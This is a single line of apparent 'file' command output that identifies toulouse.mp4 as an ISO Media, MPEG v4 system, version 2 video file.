toulouse.mp4: ISO Media, MPEG v4 system, version 2